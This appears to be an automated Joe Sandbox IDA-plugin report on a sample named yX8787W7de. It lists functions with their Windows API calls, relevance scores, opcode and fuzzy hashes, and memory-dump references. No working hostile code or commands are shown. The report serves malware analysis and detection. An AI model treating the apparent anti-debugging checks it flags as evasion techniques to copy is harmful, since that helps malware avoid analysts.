Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c69ca42b6f3caf8c98898bb48338a66d9e9e7f4cc9816970127a193e9aa3a185
Instruction ID: 9ba1a99fe9e7ad242653b087d499a089bf53316bd802c0632253f4e0f8bb83af
Opcode Fuzzy Hash: c69ca42b6f3caf8c98898bb48338a66d9e9e7f4cc9816970127a193e9aa3a185
Instruction Fuzzy Hash: 6631B575D0131CABCB21DF64D889B9DBBB8AF18310F5041EAE41CA72A0EB709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 0014D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 77cd582e3a4ee4df4648387194546d87101ce1b22fdaf09df8f4770ae010f94d
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: DD022D71E002199FDF14CFA9D9906ADB7F1EF88324F25816AD919EB394D730AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0013AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0015E72C,?,?), ref: 0013AF84

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 74e00f62c2c17845211e4b506137dfbb4daccc77beea83304df0b7cdf6030e87
Instruction ID: 568d5d14424b541bfa66bfae66b75c107e87fb0df91b60a67a7d19f048e4e0e1
Opcode Fuzzy Hash: 74e00f62c2c17845211e4b506137dfbb4daccc77beea83304df0b7cdf6030e87
Instruction Fuzzy Hash: 57015A3A500308EAD7119F74EC45F9B77BCEF0C751F008026FA19AB190E370AA958BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00126C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00126DDF,00000000,00000400), ref: 00126C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00126C95

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6d4c96b766557536888bb73b1f5e03db827a09e0615b5ae1c3687b4182a4c240
Instruction ID: 76bdea8b2fe374c33db56421156c215c05924dc0a13d8217552f1cc7b3a8f6d1
Opcode Fuzzy Hash: 6d4c96b766557536888bb73b1f5e03db827a09e0615b5ae1c3687b4182a4c240
Instruction Fuzzy Hash: 95D05230244300BAEA011E219C06F2AAB98AB40B82F28C004B6A0A90E0CA708870A628

Uniqueness

Uniqueness Score: -1.00%

Function 001519F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001519EF,?,?,00000008,?,?,0015168F,00000000), ref: 00151C21

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6c6130332919c3689b27f480762156958578ea84bc1b71afce8793afa194b335
Instruction ID: 3627cd0d3cbacc5e3dcae2c6e057ea88c49afc1ab9e445f63862b580e418fa13
Opcode Fuzzy Hash: 6c6130332919c3689b27f480762156958578ea84bc1b71afce8793afa194b335
Instruction Fuzzy Hash: D4B15F35610608EFD71ACF28C486B657BE0FF45366F258658ECA9CF2A1C336E995CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0013F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0013F66A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: a64040f98436d0cca1949364e698c516cbc7598662fc59419ca84c1536319798
Instruction ID: d2bedd501b05d77b9d04b07c91e29b6f22c2a250b6be5e9d57a8a7c816ff2e4e
Opcode Fuzzy Hash: a64040f98436d0cca1949364e698c516cbc7598662fc59419ca84c1536319798
Instruction Fuzzy Hash: 80516E72D00619DFDB28CF94E9857AABBF4FB48314F24857AD411EB650D374EA42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0012B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0012B16B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 6c47f3940e7a7a7e3a18baf16f61aef9a193e4954c180cfb65170ac6aa19cd3a
Instruction ID: fee1b18ac20248f81bf8b05e7e6345cb8c8277e19033d4a32e2b704a272a52ba
Opcode Fuzzy Hash: 6c47f3940e7a7a7e3a18baf16f61aef9a193e4954c180cfb65170ac6aa19cd3a
Instruction Fuzzy Hash: 62F017B5E00258DFDB18CB18FC926DA73F1EB88315F144295E91693790C3B0AAD0CE60

Uniqueness

Uniqueness Score: -1.00%

Function 001240FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 001241BC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 988fa21bc043a47ca851037dda6bc603c30774c2b325a2936f83d56201b183ad
Instruction ID: ccaca3354212cd2efa49b8edc218c5094ecce78d957e4d068a3c8caeddd3fa7c
Opcode Fuzzy Hash: 988fa21bc043a47ca851037dda6bc603c30774c2b325a2936f83d56201b183ad
Instruction Fuzzy Hash: 1EC14772A183458FC354CF29D88065AFBE1BFC8308F19892DE998DB311D734EA54CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0013F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0013F3A5), ref: 0013F9DA

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9a3e582fad1f1261833a27ab7a8d9b7a54e00fa2ba613c3abd7dfdb59c147d2c
Instruction ID: 0ca4eb4829fed3aed704e899e50665613d30e59a6c86dc1c4fa2f244407462e1
Opcode Fuzzy Hash: 9a3e582fad1f1261833a27ab7a8d9b7a54e00fa2ba613c3abd7dfdb59c147d2c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0014C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0014C030

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 6ed74e11f496afff91ce5f0f1c34a712b90c900a379fda0de08a55e32a6d6a32
Instruction ID: 0b0264ec85babaf945ef2439b3cbbad81d736430f815b2ef7b6af93fe3b62f29
Opcode Fuzzy Hash: 6ed74e11f496afff91ce5f0f1c34a712b90c900a379fda0de08a55e32a6d6a32
Instruction Fuzzy Hash: 7BA01130202200CB83028F30AE882083AA8AB002C2328002AA808CA820EB3082E0AB00

Uniqueness

Uniqueness Score: -1.00%

Function 001362CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 21d9554b678d6f6894a9b2a34afba690f66e0a00fa48ab03ffabda20b41c27f3
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 9E62E771604785AFCB29CF28C4906B9BBE1BF95304F09C96DE8EA8B346D734E945CB11

Uniqueness

Uniqueness Score: -1.00%

Function 001377EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 8cf6cc767cf4ef0bb37bf981942d21527e7c7c89730c7ad49c97d587a43a883e
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: C762DBB160C3858FCB29CF28C4906B9BBE1BF95304F18856DF99A8B386D730E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0012F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 150634f7203691289d3ed760d2bfb36759430e65bb70044f44490d3333d91003
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 41525A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00137153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fad1a0f239b8451803ee094aeff25b636a0bc400483ec4af085953e1d84d891
Instruction ID: 66636900c61b3a28300022b92bfd1d829818872ecb085b8585e70bbbd1a5e541
Opcode Fuzzy Hash: 0fad1a0f239b8451803ee094aeff25b636a0bc400483ec4af085953e1d84d891
Instruction Fuzzy Hash: 8C12BFB16187069FC728CF28C890AB9B7E1FF94304F14892EE996C7781E334A995CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0012C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6861f126dc4716b95cc9946594edb241e49360a72be453aabbb5d72b5a1a9a
Instruction ID: e9f47701409d347df0f2d4da2b70f0a2846871f1cd1a2769fc794aa0228fb9a1
Opcode Fuzzy Hash: 8f6861f126dc4716b95cc9946594edb241e49360a72be453aabbb5d72b5a1a9a
Instruction Fuzzy Hash: BAF1AC716083218FC718CF28D49462EBBE1EFDA318F154A2EF68597365D730E959CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00136CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 535b5e39c0eb1c4308eef71c618d5aaeb9cb723a7e97e439a828ba3d6d3a8163
Instruction ID: 9f13375c55e1c67a33dbc01906d108671e03460d1e21a298214326f7c440e7de
Opcode Fuzzy Hash: 535b5e39c0eb1c4308eef71c618d5aaeb9cb723a7e97e439a828ba3d6d3a8163
Instruction Fuzzy Hash: 7ED1C7B16083459FDB24CF28C84475BBBE5BF99308F08856DF8899B342D774E909CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0012E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53cb3f867c88c0d5a3e1c95ad8335b0831792f38279658362985461ce16c7e2b
Instruction ID: d5df41f9f7641fd695b46f8923fe0ca48fe25ce4525046754841a3d58b09dc5e
Opcode Fuzzy Hash: 53cb3f867c88c0d5a3e1c95ad8335b0831792f38279658362985461ce16c7e2b
Instruction Fuzzy Hash: 33E165755083948FC304CF69D89086ABFF1AF9A300F49095EF9C497392C375EA59DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00134088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 9f9ac276021c4dd573d92148d2cfa0a88f8dfaa8c5d6a12c2e7efba3bbba131f
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: C39146B020074A8BDB28EF64E891BFA77D5EFA0300F50092DF996D7282DB74B559C752

Uniqueness

Uniqueness Score: -1.00%

Function 001343BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 68278fac6b14294a134ef8c8eda8f341e422dbc1807bf3ad6fd17b765d867605
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 3F8139B17043468FEB28DE68D8D1BBD77D4EFA1304F00093DE9C68B282DB74A9858756

Uniqueness

Uniqueness Score: -1.00%

Function 001451C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7d402fdcbe321c6bfd4060aa016fc34d5bb38f7055ed31a8de0dd7f9aa1686
Instruction ID: e2128a5aefeafaecc10d151150bda0333b51c94aca5fe60073671005a97e764a
Opcode Fuzzy Hash: ff7d402fdcbe321c6bfd4060aa016fc34d5bb38f7055ed31a8de0dd7f9aa1686
Instruction Fuzzy Hash: 1A615631A00F09A7DB389A68A895FBE2397FB52784F14061BF482DF2B3D7D1DD428611

Uniqueness

Uniqueness Score: -1.00%

Function 00144F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
